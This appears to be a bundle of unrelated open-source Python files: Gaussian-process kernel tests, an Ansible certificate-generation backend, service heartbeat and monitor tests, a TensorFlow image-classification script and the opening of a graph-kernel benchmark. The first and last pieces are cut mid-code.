        diff = (np.max(np.abs(ky_mat-ky_mat0)))
        assert (diff<1e-12), "multi hyps parameter implementation is wrong"
        # parallel implementation
        ky_mat = func[1](ky_mat_old, hyps, name,
                         ker, cutoffs,
                         hyps_mask, n_cpus=2, n_sample=20)
        diff = (np.max(np.abs(ky_mat-ky_mat0)))
        assert (diff<1e-12), "multi hyps parameter parallel "\
                             "implementation is wrong"
def test_get_kernel_vector(params):
    """Serial and parallel get_kernel_vector must agree for the masked kernel,
    and the vector must have 3 components per training environment."""
    hyps, name, kernel, cutoffs, \
        kernel_m, hyps_list, hyps_mask_list = params
    test_point = get_tstp()
    size = len(flare.gp_algebra._global_training_data[name])
    # test the parallel implementation for multihyps
    # NOTE(review): `hyps` here is the plain 5-element set while
    # hyps_mask_list[0] describes 9 masked hyper-parameters -- confirm this
    # combination is intended (hyps_list[0] would be the matching 9-element set).
    vec = get_kernel_vector(name, kernel_m[0],
                            test_point, 1, hyps,
                            cutoffs, hyps_mask_list[0])
    vec_par = get_kernel_vector(name, kernel_m[0],
                                test_point, 1, hyps,
                                cutoffs, hyps_mask_list[0],
                                n_cpus=2, n_sample=100)
    assert (all(np.equal(vec, vec_par))), "parallel implementation is wrong"
    # one force-component kernel entry per Cartesian direction per environment
    assert (vec.shape[0] == size*3), \
        f"{vec} {size}"
def test_ky_and_hyp(params):
    """Check get_ky_and_hyp: parallel vs serial, and each masked setup against
    the unmasked reference (including the hyperparameter-gradient stack)."""
    hyps, name, kernel, cutoffs, \
        kernel_m, hyps_list, hyps_mask_list = params
    hypmat_0, ky_mat0 = get_ky_and_hyp(hyps, name,
                                       kernel[1], cutoffs)
    # parallel version
    hypmat, ky_mat = get_ky_and_hyp(hyps, name,
                                    kernel[1], cutoffs, n_cpus=2)
    diff = (np.max(np.abs(ky_mat-ky_mat0)))
    assert (diff==0), "parallel implementation is wrong"
    # check all cases
    for i in range(len(hyps_list)):
        hyps = hyps_list[i]
        hyps_mask = hyps_mask_list[i]
        if hyps_mask is None:
            ker = kernel[1]
        else:
            ker = kernel_m[1]
        # serial implementation
        hypmat, ky_mat = get_ky_and_hyp(
            hyps, name, ker, cutoffs, hyps_mask)
        if (i == 0):
            # keep the full 9-hyperparameter gradient stack as reference for
            # the constrained cases below
            hypmat9 = hypmat
        diff = (np.max(np.abs(ky_mat-ky_mat0)))
        assert (diff==0), "multi hyps parameter implementation is wrong"
        # compare to no hyps_mask version: constrained cases must match the
        # corresponding slices of the full gradient stack
        diff = 0
        if (i == 1):
            diff = (np.max(np.abs(hypmat-hypmat9[[0,2,4,6,8], :, :])))
        elif (i==2):
            diff = (np.max(np.abs(hypmat-hypmat9[[0,2,4,6], :, :])))
        elif (i==3):
            diff = (np.max(np.abs(hypmat-hypmat_0)))
        elif (i==4):
            diff = (np.max(np.abs(hypmat-hypmat_0)))
        assert (diff==0), "multi hyps implementation is wrong"\
                          f"in case {i}"
        # parallel implementation
        hypmat_par, ky_mat_par = get_ky_and_hyp(hyps, name,
                                                ker, cutoffs, hyps_mask,
                                                n_cpus=2, n_sample=2)
        # compare to serial implementation
        diff = (np.max(np.abs(ky_mat-ky_mat_par)))
        assert (diff==0), f"multi hyps parallel "\
                          f"implementation is wrong in case {i}"
        diff = (np.max(np.abs(hypmat_par-hypmat)))
        assert (diff==0), f"multi hyps parallel implementation is wrong"\
                          f" in case{i}"
def test_grad(params):
    """Check that likelihood and likelihood-gradient values agree between the
    unmasked reference and every masked hyperparameter configuration."""
    hyps, name, kernel, cutoffs, \
        kernel_m, hyps_list, hyps_mask_list = params
    # obtain reference
    func = get_ky_and_hyp
    hyp_mat, ky_mat = func(hyps, name,
                           kernel[1], cutoffs)
    like0, like_grad0 = \
        get_like_grad_from_mats(ky_mat, hyp_mat, name)
    # serial implementation (recompute to confirm determinism)
    func = get_ky_and_hyp
    hyp_mat, ky_mat = func(hyps, name,
                           kernel[1], cutoffs)
    like, like_grad = \
        get_like_grad_from_mats(ky_mat, hyp_mat, name)
    assert (like==like0), "wrong likelihood"
    assert np.max(np.abs(like_grad-like_grad0))==0, "wrong likelihood"
    func = get_ky_and_hyp
    for i in range(len(hyps_list)):
        hyps = hyps_list[i]
        hyps_mask = hyps_mask_list[i]
        if hyps_mask is None:
            ker = kernel[1]
        else:
            ker = kernel_m[1]
        hyp_mat, ky_mat = func(hyps, name,
                               ker, cutoffs, hyps_mask)
        like, like_grad = \
            get_like_grad_from_mats(ky_mat, hyp_mat, name)
        assert (like==like0), "wrong likelihood"
        if (i==0):
            # keep the full 9-component gradient as reference for the
            # constrained cases below
            like_grad9 = like_grad
        diff = 0
        if (i==1):
            diff = (np.max(np.abs(like_grad-like_grad9[[0,2,4,6,8]])))
        elif (i==2):
            diff = (np.max(np.abs(like_grad-like_grad9[[0,2,4,6]])))
        elif (i==3):
            diff = (np.max(np.abs(like_grad-like_grad0)))
        elif (i==4):
            diff = (np.max(np.abs(like_grad-like_grad0)))
        assert (diff==0), "multi hyps implementation is wrong"\
                          f"in case {i}"
def test_ky_hyp_grad(params):
    """Validate the analytic likelihood gradient against a central
    finite-difference estimate (step 0.001, tolerance 1e-3)."""
    hyps, name, kernel, cutoffs, \
        kernel_m, hyps_list, hyps_mask_list = params
    func = get_ky_and_hyp
    hyp_mat, ky_mat = func(hyps, name,
                           kernel[1], cutoffs)
    size = len(flare.gp_algebra._global_training_data[name])
    like, like_grad = \
        get_like_grad_from_mats(ky_mat, hyp_mat, name)
    delta = 0.001
    for i in range(len(hyps)):
        # perturb one hyperparameter at a time: +delta then -delta
        newhyps = np.copy(hyps)
        newhyps[i] += delta
        hyp_mat_p, ky_mat_p = func(newhyps, name,
                                   kernel[1], cutoffs)
        like_p, like_grad_p = \
            get_like_grad_from_mats(ky_mat_p, hyp_mat_p, name)
        newhyps[i] -= 2*delta
        hyp_mat_m, ky_mat_m = func(newhyps, name,
                                   kernel[1], cutoffs)
        like_m, like_grad_m = \
            get_like_grad_from_mats(ky_mat_m, hyp_mat_m, name)
        # central difference: (f(x+d) - f(x-d)) / (2 d)
        diff = np.abs(like_grad[i]-(like_p-like_m)/2./delta)
        assert (diff < 1e-3), "wrong calculation of hyp_mat"
|
<reponame>usegalaxy-no/usegalaxy<gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright: (c) 2016-2017, <NAME> <<EMAIL>>
# Copyright: (c) 2017, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import abc
import traceback
from distutils.version import LooseVersion
from ansible.module_utils import six
from ansible.module_utils.basic import missing_required_lib
from ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.common import ArgumentSpec
from ansible_collections.community.crypto.plugins.module_utils.crypto.basic import (
OpenSSLObjectError,
OpenSSLBadPassphraseError,
)
from ansible_collections.community.crypto.plugins.module_utils.crypto.support import (
load_privatekey,
load_certificate,
load_certificate_request,
)
from ansible_collections.community.crypto.plugins.module_utils.crypto.cryptography_support import (
cryptography_compare_public_keys,
)
from ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.certificate_info import (
get_certificate_info,
)
# Minimum backend library versions supported by this module.
MINIMAL_CRYPTOGRAPHY_VERSION = '1.6'
MINIMAL_PYOPENSSL_VERSION = '0.15'
# Probe the pyOpenSSL backend: record availability and the import traceback
# (for later error reporting) instead of failing at module import time.
PYOPENSSL_IMP_ERR = None
try:
    import OpenSSL
    from OpenSSL import crypto
    PYOPENSSL_VERSION = LooseVersion(OpenSSL.__version__)
except ImportError:
    PYOPENSSL_IMP_ERR = traceback.format_exc()
    PYOPENSSL_FOUND = False
else:
    PYOPENSSL_FOUND = True
# Probe the cryptography backend in the same way.
CRYPTOGRAPHY_IMP_ERR = None
CRYPTOGRAPHY_VERSION = None
try:
    import cryptography
    from cryptography import x509
    CRYPTOGRAPHY_VERSION = LooseVersion(cryptography.__version__)
except ImportError:
    CRYPTOGRAPHY_IMP_ERR = traceback.format_exc()
    CRYPTOGRAPHY_FOUND = False
else:
    CRYPTOGRAPHY_FOUND = True
class CertificateError(OpenSSLObjectError):
    """Error raised by the certificate backends in this module."""
    pass
@six.add_metaclass(abc.ABCMeta)
class CertificateBackend(object):
    """Abstract base for certificate generation backends.

    Reads the common module parameters, lazily loads the private key, CSR
    and any existing certificate, and decides whether the certificate has
    to be (re-)generated. Concrete subclasses implement the actual
    generation for one crypto backend ('pyopenssl' or 'cryptography').
    """
    def __init__(self, module, backend):
        self.module = module
        self.backend = backend  # 'pyopenssl' or 'cryptography'
        self.force = module.params['force']
        self.privatekey_path = module.params['privatekey_path']
        self.privatekey_content = module.params['privatekey_content']
        if self.privatekey_content is not None:
            # Crypto loaders expect bytes, module params arrive as text.
            self.privatekey_content = self.privatekey_content.encode('utf-8')
        self.privatekey_passphrase = module.params['privatekey_passphrase']
        self.csr_path = module.params['csr_path']
        self.csr_content = module.params['csr_content']
        if self.csr_content is not None:
            self.csr_content = self.csr_content.encode('utf-8')
        # The following are default values which make sure check() works as
        # before if providers do not explicitly change these properties.
        self.create_subject_key_identifier = 'never_create'
        self.create_authority_key_identifier = False
        # Lazily populated by the _ensure_*_loaded helpers below.
        self.privatekey = None
        self.csr = None
        self.cert = None
        self.existing_certificate = None
        self.existing_certificate_bytes = None
        self.check_csr_subject = True
        self.check_csr_extensions = True
        self.diff_before = self._get_info(None)
        self.diff_after = self._get_info(None)
    def _get_info(self, data):
        """Return a dict describing the certificate bytes *data* for diffing.

        Returns an empty dict for ``None`` and a minimal marker dict when the
        data cannot be parsed as a certificate.
        """
        if data is None:
            return dict()
        try:
            result = get_certificate_info(self.module, self.backend, data, prefer_one_fingerprint=True)
            result['can_parse_certificate'] = True
            return result
        except Exception as exc:
            return dict(can_parse_certificate=False)
    @abc.abstractmethod
    def generate_certificate(self):
        """(Re-)Generate certificate."""
        pass
    @abc.abstractmethod
    def get_certificate_data(self):
        """Return bytes for self.cert."""
        pass
    def set_existing(self, certificate_bytes):
        """Set existing certificate bytes. None indicates that the key does not exist."""
        self.existing_certificate_bytes = certificate_bytes
        self.diff_after = self.diff_before = self._get_info(self.existing_certificate_bytes)
    def has_existing(self):
        """Query whether an existing certificate is/has been there."""
        return self.existing_certificate_bytes is not None
    def _ensure_private_key_loaded(self):
        """Load the provided private key into self.privatekey."""
        # Idempotent: skip when already loaded or when no key was provided.
        if self.privatekey is not None:
            return
        if self.privatekey_path is None and self.privatekey_content is None:
            return
        try:
            self.privatekey = load_privatekey(
                path=self.privatekey_path,
                content=self.privatekey_content,
                passphrase=self.privatekey_passphrase,
                backend=self.backend,
            )
        except OpenSSLBadPassphraseError as exc:
            raise CertificateError(exc)
    def _ensure_csr_loaded(self):
        """Load the CSR into self.csr."""
        if self.csr is not None:
            return
        if self.csr_path is None and self.csr_content is None:
            return
        self.csr = load_certificate_request(
            path=self.csr_path,
            content=self.csr_content,
            backend=self.backend,
        )
    def _ensure_existing_certificate_loaded(self):
        """Load the existing certificate into self.existing_certificate."""
        if self.existing_certificate is not None:
            return
        if self.existing_certificate_bytes is None:
            return
        self.existing_certificate = load_certificate(
            path=None,
            content=self.existing_certificate_bytes,
            backend=self.backend,
        )
    def _check_privatekey(self):
        """Check whether provided parameters match, assuming self.existing_certificate and self.privatekey have been populated."""
        if self.backend == 'pyopenssl':
            # pyOpenSSL has no direct key comparison; use an SSL context's
            # built-in consistency check between key and certificate.
            ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD)
            ctx.use_privatekey(self.privatekey)
            ctx.use_certificate(self.existing_certificate)
            try:
                ctx.check_privatekey()
                return True
            except OpenSSL.SSL.Error:
                return False
        elif self.backend == 'cryptography':
            return cryptography_compare_public_keys(self.existing_certificate.public_key(), self.privatekey.public_key())
    def _check_csr(self):
        """Check whether provided parameters match, assuming self.existing_certificate and self.csr have been populated."""
        if self.backend == 'pyopenssl':
            # Verify that CSR is signed by certificate's private key
            try:
                self.csr.verify(self.existing_certificate.get_pubkey())
            except OpenSSL.crypto.Error:
                return False
            # Check subject
            if self.check_csr_subject and self.csr.get_subject() != self.existing_certificate.get_subject():
                return False
            # Check extensions
            if not self.check_csr_extensions:
                return True
            csr_extensions = self.csr.get_extensions()
            cert_extension_count = self.existing_certificate.get_extension_count()
            if len(csr_extensions) != cert_extension_count:
                return False
            for extension_number in range(0, cert_extension_count):
                cert_extension = self.existing_certificate.get_extension(extension_number)
                csr_extension = filter(lambda extension: extension.get_short_name() == cert_extension.get_short_name(), csr_extensions)
                # NOTE(review): if no CSR extension matches this short name,
                # list(csr_extension)[0] raises IndexError (the earlier count
                # check only guarantees equal totals) -- confirm whether a
                # mismatch here should instead return False.
                if cert_extension.get_data() != list(csr_extension)[0].get_data():
                    return False
            return True
        elif self.backend == 'cryptography':
            # Verify that CSR is signed by certificate's private key
            if not self.csr.is_signature_valid:
                return False
            if not cryptography_compare_public_keys(self.csr.public_key(), self.existing_certificate.public_key()):
                return False
            # Check subject
            if self.check_csr_subject and self.csr.subject != self.existing_certificate.subject:
                return False
            # Check extensions
            if not self.check_csr_extensions:
                return True
            cert_exts = list(self.existing_certificate.extensions)
            csr_exts = list(self.csr.extensions)
            if self.create_subject_key_identifier != 'never_create':
                # Filter out SubjectKeyIdentifier extension before comparison
                cert_exts = list(filter(lambda x: not isinstance(x.value, x509.SubjectKeyIdentifier), cert_exts))
                csr_exts = list(filter(lambda x: not isinstance(x.value, x509.SubjectKeyIdentifier), csr_exts))
            if self.create_authority_key_identifier:
                # Filter out AuthorityKeyIdentifier extension before comparison
                cert_exts = list(filter(lambda x: not isinstance(x.value, x509.AuthorityKeyIdentifier), cert_exts))
                csr_exts = list(filter(lambda x: not isinstance(x.value, x509.AuthorityKeyIdentifier), csr_exts))
            if len(cert_exts) != len(csr_exts):
                return False
            for cert_ext in cert_exts:
                try:
                    csr_ext = self.csr.extensions.get_extension_for_oid(cert_ext.oid)
                    if cert_ext != csr_ext:
                        return False
                except cryptography.x509.ExtensionNotFound as dummy:
                    return False
            return True
    def _check_subject_key_identifier(self):
        """Check whether Subject Key Identifier matches, assuming self.existing_certificate has been populated."""
        if self.backend != 'cryptography':
            # We do not support SKI with pyOpenSSL backend
            return True
        # Get hold of certificate's SKI
        try:
            ext = self.existing_certificate.extensions.get_extension_for_class(x509.SubjectKeyIdentifier)
        except cryptography.x509.ExtensionNotFound as dummy:
            return False
        # Get hold of CSR's SKI for 'create_if_not_provided'
        csr_ext = None
        if self.create_subject_key_identifier == 'create_if_not_provided':
            try:
                csr_ext = self.csr.extensions.get_extension_for_class(x509.SubjectKeyIdentifier)
            except cryptography.x509.ExtensionNotFound as dummy:
                pass
        if csr_ext is None:
            # If CSR had no SKI, or we chose to ignore it ('always_create'), compare with created SKI
            if ext.value.digest != x509.SubjectKeyIdentifier.from_public_key(self.existing_certificate.public_key()).digest:
                return False
        else:
            # If CSR had SKI and we didn't ignore it ('create_if_not_provided'), compare SKIs
            if ext.value.digest != csr_ext.value.digest:
                return False
        return True
    def needs_regeneration(self):
        """Check whether a regeneration is necessary."""
        # force=True or no existing certificate always regenerates.
        if self.force or self.existing_certificate_bytes is None:
            return True
        try:
            self._ensure_existing_certificate_loaded()
        except Exception as dummy:
            # Unparseable existing certificate: regenerate rather than fail.
            return True
        # Check whether private key matches
        self._ensure_private_key_loaded()
        if self.privatekey is not None and not self._check_privatekey():
            return True
        # Check whether CSR matches
        self._ensure_csr_loaded()
        if self.csr is not None and not self._check_csr():
            return True
        # Check SubjectKeyIdentifier
        if self.create_subject_key_identifier != 'never_create' and not self._check_subject_key_identifier():
            return True
        return False
    def dump(self, include_certificate):
        """Serialize the object into a dictionary."""
        result = {
            'privatekey': self.privatekey_path,
            'csr': self.csr_path
        }
        # Get hold of certificate bytes: a freshly generated cert wins over
        # the pre-existing one.
        certificate_bytes = self.existing_certificate_bytes
        if self.cert is not None:
            certificate_bytes = self.get_certificate_data()
        self.diff_after = self._get_info(certificate_bytes)
        if include_certificate:
            # Store result
            result['certificate'] = certificate_bytes.decode('utf-8') if certificate_bytes else None
        result['diff'] = dict(
            before=self.diff_before,
            after=self.diff_after,
        )
        return result
@six.add_metaclass(abc.ABCMeta)
class CertificateProvider(object):
    """Abstract interface a certificate provider must implement.

    Concrete providers (selfsigned, ownca, acme, ...) validate their own
    module arguments and construct a matching CertificateBackend instance.
    """
    @abc.abstractmethod
    def validate_module_args(self, module):
        """Check module arguments; call module.fail_json() on invalid input."""
    @abc.abstractmethod
    def needs_version_two_certs(self, module):
        """Whether the provider needs to create a version 2 certificate."""
    def needs_pyopenssl_get_extensions(self, module):
        """Whether the provider needs to use get_extensions() with pyOpenSSL."""
        # Default: assume the provider inspects CSR extensions.
        return True
    @abc.abstractmethod
    def create_backend(self, module, backend):
        """Create an implementation for a backend.
        Return value must be instance of CertificateBackend.
        """
def select_backend(module, backend, provider):
    """Pick a crypto backend (cryptography or pyOpenSSL) and build the provider's backend object.

    :type module: AnsibleModule
    :type backend: str
    :type provider: CertificateProvider
    :return: the CertificateBackend created by ``provider.create_backend``
    """
    provider.validate_module_args(module)
    # NOTE(review): the 'backend' argument is immediately overwritten from
    # module params here — confirm whether the parameter is still needed.
    backend = module.params['select_crypto_backend']
    if backend == 'auto':
        # Detect what backend we can use
        can_use_cryptography = CRYPTOGRAPHY_FOUND and CRYPTOGRAPHY_VERSION >= LooseVersion(MINIMAL_CRYPTOGRAPHY_VERSION)
        can_use_pyopenssl = PYOPENSSL_FOUND and PYOPENSSL_VERSION >= LooseVersion(MINIMAL_PYOPENSSL_VERSION)
        # If cryptography is available we'll use it
        if can_use_cryptography:
            backend = 'cryptography'
        elif can_use_pyopenssl:
            backend = 'pyopenssl'
        # cryptography cannot emit v2 certificates; force pyOpenSSL if needed.
        if provider.needs_version_two_certs(module):
            module.warn('crypto backend forced to pyopenssl. The cryptography library does not support v2 certificates')
            backend = 'pyopenssl'
        # Fail if no backend has been found
        if backend == 'auto':
            module.fail_json(msg=("Can't detect any of the required Python libraries "
                                  "cryptography (>= {0}) or PyOpenSSL (>= {1})").format(
                                      MINIMAL_CRYPTOGRAPHY_VERSION,
                                      MINIMAL_PYOPENSSL_VERSION))
    if backend == 'pyopenssl':
        module.deprecate('The module is using the PyOpenSSL backend. This backend has been deprecated',
                         version='2.0.0', collection_name='community.crypto')
        if not PYOPENSSL_FOUND:
            module.fail_json(msg=missing_required_lib('pyOpenSSL >= {0}'.format(MINIMAL_PYOPENSSL_VERSION)),
                             exception=PYOPENSSL_IMP_ERR)
        if provider.needs_pyopenssl_get_extensions(module):
            # X509Req.get_extensions() only exists in sufficiently new pyOpenSSL.
            try:
                getattr(crypto.X509Req, 'get_extensions')
            except AttributeError:
                module.fail_json(msg='You need to have PyOpenSSL>=0.15')
    elif backend == 'cryptography':
        if not CRYPTOGRAPHY_FOUND:
            module.fail_json(msg=missing_required_lib('cryptography >= {0}'.format(MINIMAL_CRYPTOGRAPHY_VERSION)),
                             exception=CRYPTOGRAPHY_IMP_ERR)
        if provider.needs_version_two_certs(module):
            module.fail_json(msg='The cryptography backend does not support v2 certificates, '
                                 'use select_crypto_backend=pyopenssl for v2 certificates')
    return provider.create_backend(module, backend)
def get_certificate_argument_spec():
    """Return the ArgumentSpec shared by all certificate modules.

    The ``provider`` choices list starts empty and is extended by the
    per-provider add_XXX_provider_to_argument_spec() helpers.
    """
    return ArgumentSpec(
        argument_spec=dict(
            provider=dict(type='str', choices=[]),  # choices will be filled by add_XXX_provider_to_argument_spec() in certificate_xxx.py
            force=dict(type='bool', default=False,),
            csr_path=dict(type='path'),
            csr_content=dict(type='str'),
            select_crypto_backend=dict(type='str', default='auto', choices=['auto', 'cryptography', 'pyopenssl']),
            # General properties of a certificate
            privatekey_path=dict(type='path'),
            privatekey_content=dict(type='str', no_log=True),
            privatekey_passphrase=dict(type='str', no_log=True),
        ),
        mutually_exclusive=[
            ['csr_path', 'csr_content'],
            ['privatekey_path', 'privatekey_content'],
        ],
    )
|
<gh_stars>0
from ichnaea.geoip import GeoIPNull
from ichnaea.log import PingableStatsClient
from ichnaea.tests.base import (
_make_db,
_make_redis,
AppTestCase,
)
class TestHeartbeat(AppTestCase):
    """Exercise the /__heartbeat__ endpoint on a healthy application."""

    def test_ok(self):
        """A healthy service answers 200 with a JSON 'OK' status."""
        response = self.app.get('/__heartbeat__', status=200)
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['status'], 'OK')
class TestDatabaseHeartbeat(AppTestCase):
    """Heartbeat behaviour when the read-only database is unreachable."""

    def test_database_error(self):
        # NOTE: self.app is shared at class level, so this test lives in its
        # own class to keep the broken connection from leaking into others.
        broken_uri = 'mysql+pymysql://none:none@127.0.0.1:9/test_location'
        # Point the read-only DB at the discard port so connections fail.
        self.app.app.registry.db_ro = _make_db(uri=broken_uri)
        response = self.app.get('/__heartbeat__', status=200)
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['status'], 'OK')
class TestMonitor(AppTestCase):
    """Exercise the /__monitor__ endpoint with all services healthy."""

    def test_ok(self):
        res = self.app.get('/__monitor__', status=200)
        self.assertEqual(res.content_type, 'application/json')
        payload = res.json
        expected_services = {'database', 'geoip', 'redis', 'stats'}
        self.assertEqual(set(payload.keys()), expected_services)
        # Every service must report as up with a non-negative integer timing.
        for service in expected_services:
            entry = payload[service]
            self.assertEqual(entry['up'], True)
            self.assertTrue(isinstance(entry['time'], int))
            self.assertTrue(entry['time'] >= 0)
        # The GeoIP database age should be plausible (days, not centuries).
        self.assertTrue(1 < payload['geoip']['age_in_days'] < 1000)
class TestMonitorErrors(AppTestCase):
    """Monitor endpoint responses when every backend service is broken."""

    def setUp(self):
        super(TestMonitorErrors, self).setUp()
        registry = self.app.app.registry
        # Database connections aimed at the discard port never succeed;
        # break both the read-write and read-only handles.
        self.broken_db = _make_db(
            uri='mysql+pymysql://none:none@127.0.0.1:9/none')
        registry.db_rw = self.broken_db
        registry.db_ro = self.broken_db
        # create broken geoip db
        registry.geoip_db = GeoIPNull()
        # create broken redis connection
        self.broken_redis = _make_redis('redis://127.0.0.1:9/15')
        registry.redis_client = self.broken_redis
        # create broken stats client
        self.broken_stats = PingableStatsClient(host='127.0.0.1', port=0)
        registry.stats_client = self.broken_stats

    def tearDown(self):
        super(TestMonitorErrors, self).tearDown()
        del self.broken_db
        self.broken_redis.connection_pool.disconnect()
        del self.broken_redis
        del self.broken_stats

    def _monitor_json(self):
        """Fetch /__monitor__, expecting a 503, and return its JSON body."""
        res = self.app.get('/__monitor__', status=503)
        self.assertEqual(res.content_type, 'application/json')
        return res.json

    def test_database_error(self):
        self.assertEqual(self._monitor_json()['database'],
                         {'up': False, 'time': 0})

    def test_geoip_error(self):
        self.assertEqual(self._monitor_json()['geoip'],
                         {'up': False, 'time': 0, 'age_in_days': -1})

    def test_redis_error(self):
        self.assertEqual(self._monitor_json()['redis'],
                         {'up': False, 'time': 0})

    def test_stats_error(self):
        self.assertEqual(self._monitor_json()['stats'],
                         {'up': False, 'time': 0})
|
<gh_stars>0
import glob
import os
import re
import pathlib
import PIL
# next line is to limit tensorflow verbose output
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import numpy as np
from tensorflow.keras.models import load_model
# Path to the already-trained transfer-learning classifier (saved Keras model).
CONST_MODEL_PATH = 'trained_models/tf2_model_cnn_transfer_learning_mobilenet-v2_with_data_augmentation_classifier'
# Position in this list is the integer class label produced by the model.
CONST_CLASS_NAMES = ['cats', 'dogs']
# Target resolution the images are resized to before prediction.
CONST_IMAGE_SIZE = (160, 160)
# Directory of held-out *.jpeg images; filenames start with the class name.
CONST_NEW_IMAGES = 'unseen_test_samples/cats_dogs'
# Normalisation is not needed here, because it is integrated in the first
# layer of the model:
#   layers.experimental.preprocessing.Rescaling(1. / 255, input_shape=(img_height, img_width, 3)),
CONST_IMAGE_RESCALE = 1.0
def make_images_predictions_from_retrained_model(path_to_images, path_to_model, class_list, image_size,
                                                 normalization_factor):
    """Classify every *.jpeg image in a directory with a saved Keras model and print a score summary.

    The expected class of each image is derived from its filename: the prefix
    before the first digit (e.g. "cats01.jpeg" -> "cats") must appear in
    ``class_list``; other files are counted as ignored.

    :param path_to_images: directory containing the *.jpeg test images
    :param path_to_model: path accepted by tf.keras ``load_model``
    :param class_list: ordered class names; index == integer label
    :param image_size: (width, height) target resolution for loading
    :param normalization_factor: multiplier applied to pixel values
    :return: None; results are printed to stdout
    """
    print('# Tensorflow version : {}'.format(tf.__version__))
    print('# Loading model already fitted.')
    print("### will try to load model from path : {}".format(path_to_model))
    model = load_model(path_to_model)
    # The saved model ends in a single logit; a sigmoid is applied below.
    # probability_model = tf.keras.Sequential([model, tf.keras.layers.Softmax()])
    probability_model = model
    print("### Now trying model.predict with a brand new set of images !")
    test_images_path = sorted(glob.glob('{}/*.jpeg'.format(path_to_images)))
    print("# found {} images in path : {} ".format(len(test_images_path), path_to_images))
    num_correct_predictions = 0
    num_wrong_predictions = 0
    num_ignored_images = 0
    for image_path in test_images_path:
        filename = os.path.basename(image_path)
        filename_without_ext = os.path.splitext(filename)[0]
        # Class name is the filename prefix before the first run of digits.
        image_real_class_name = re.split(r'\d+', filename_without_ext)[0]
        # Keep the try block narrow: only an unknown label counts as
        # "ignored". Previously the whole prediction was inside this try,
        # so genuine ValueErrors from TF were silently miscounted.
        try:
            image_real_class = class_list.index(image_real_class_name)
        except ValueError as e:
            num_ignored_images += 1
            print('WARNING : Image name {} is not in the given categories'.format(filename))
            print('WARNING : Image name {} will not be in the test set !'.format(filename))
            print('Exception : {}'.format(e))
            continue
        test_image = tf.keras.preprocessing.image.load_img(image_path,
                                                           color_mode='rgb',
                                                           target_size=image_size,
                                                           interpolation='nearest')
        # REMEMBER TO 'NORMALIZE' YOUR DATA (same scaling as at training time)!
        test_image_normalized = np.asarray(test_image) * normalization_factor
        # Add a leading batch dimension: (1, H, W, 3).
        test_image_normalized_arr = np.expand_dims(test_image_normalized, 0)
        predictions_single = probability_model.predict(test_image_normalized_arr)
        res = predictions_single[0]
        # Apply a sigmoid since our model returns logits, then threshold at 0.5.
        predictions = tf.nn.sigmoid(res)
        predictions = tf.where(predictions < 0.5, 0, 1)
        predicted_class = predictions.numpy()[0]
        predicted_class_name = class_list[predicted_class.item()]
        if predicted_class == image_real_class:
            num_correct_predictions += 1
            print('# ✅ ✅ prediction for {} is CORRECT {} = {:10} '.format(
                filename, predicted_class, predicted_class_name))
        else:
            num_wrong_predictions += 1
            print('# ❌ ❌ prediction for {} is WRONG {} = {:10}'.format(
                filename, predicted_class, predicted_class_name))
    print('=' * 80)
    print('{} CORRECT PREDICTIONS, {} WRONG PREDICTIONS'.format(num_correct_predictions, num_wrong_predictions))
    if num_ignored_images:
        # Bug fix: this counter was tracked but never reported.
        print('{} IMAGES IGNORED (unknown category in filename)'.format(num_ignored_images))
    total = num_correct_predictions + num_wrong_predictions
    if total > 0:
        percent_success = (num_correct_predictions / total) * 100
        print('{:2.2f}% percent success !'.format(percent_success))
if __name__ == '__main__':
    # Entry point: classify every unseen image with the retrained model and
    # print per-image results plus an overall success percentage.
    print('# REUSING A Mobile Net V2 model modified with transfer learning on cats and dogs ')
    print(" # Cats and dogs categories are obviously : \n{}".format(CONST_CLASS_NAMES))
    make_images_predictions_from_retrained_model(
        path_to_images=CONST_NEW_IMAGES,
        path_to_model=CONST_MODEL_PATH,
        class_list=CONST_CLASS_NAMES,
        image_size=CONST_IMAGE_SIZE,
        normalization_factor=CONST_IMAGE_RESCALE
    )
|
"""
=========================================================
Classification statistics on the MUTAG, ENZYMES datasets.
=========================================================
An example plot of :class:`grakel.GraphKernel`
"""
from __future__ import print_function
print(__doc__)
import time
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn import svm
from grakel import datasets
from grakel import GraphKernel
def sec_to_time(sec):
    """Format a duration given in seconds as a human-readable string.

    Splits *sec* into days/hours/minutes/seconds and joins the non-zero
    parts, e.g. ``90061 -> '1 d 1 h 1 m 1 s'``. Fractional seconds are
    rounded to two decimals.

    Bug fix: a zero duration now yields ``'0 s'`` instead of an empty string.
    """
    dt = list()
    days = int(sec // 86400)
    if days > 0:
        sec -= 86400*days
        dt.append(str(days) + " d")
    hrs = int(sec // 3600)
    if hrs > 0:
        sec -= 3600*hrs
        dt.append(str(hrs) + " h")
    mins = int(sec // 60)
    if mins > 0:
        sec -= 60*mins
        dt.append(str(mins) + " m")
    if sec > 0:
        dt.append(str(round(sec, 2)) + " s")
    if not dt:
        # Nothing accumulated: the duration was zero (or negative).
        return "0 s"
    return " ".join(dt)
# Loads benchmark datasets from:
# https://ls11-www.cs.tu-dortmund.de/staff/morris/graphkerneldatasets
# the biggest collection of benchmark datasets for graph_kernels.
# NOTE(review): the module docstring mentions ENZYMES, but 'columns' below
# actually uses MSRC_21C — confirm which dataset was intended.
# Kernel configurations to benchmark; each value is the grakel kernel spec.
kernels = {
    "Shortest Path": [{"name": "shortest_path"}],
    "Graphlet Sampling": [{"name": "graphlet_sampling",
                           "sampling": {"n_samples": 150}}],
    "Weisfeiler-Lehman/Subtree": [{"name": "weisfeiler_lehman", "niter": 5},
                                  {"name": "subtree_wl"}],
    "Weisfeiler-Lehman/Shortest-Path": [{"name": "weisfeiler_lehman",
                                         "niter": 5},
                                        {"name": "shortest_path"}]
}
columns = ["MUTAG", "MSRC_21C"]
rows = sorted(list(kernels.keys()))
# data_dataset[j][i] holds "time ~ accuracy%" for dataset j, kernel i.
data_dataset = list()
for (j, d) in enumerate(columns):
    print(d)
    data_kernel = list()
    dataset_d = datasets.fetch_dataset(d, verbose=False)
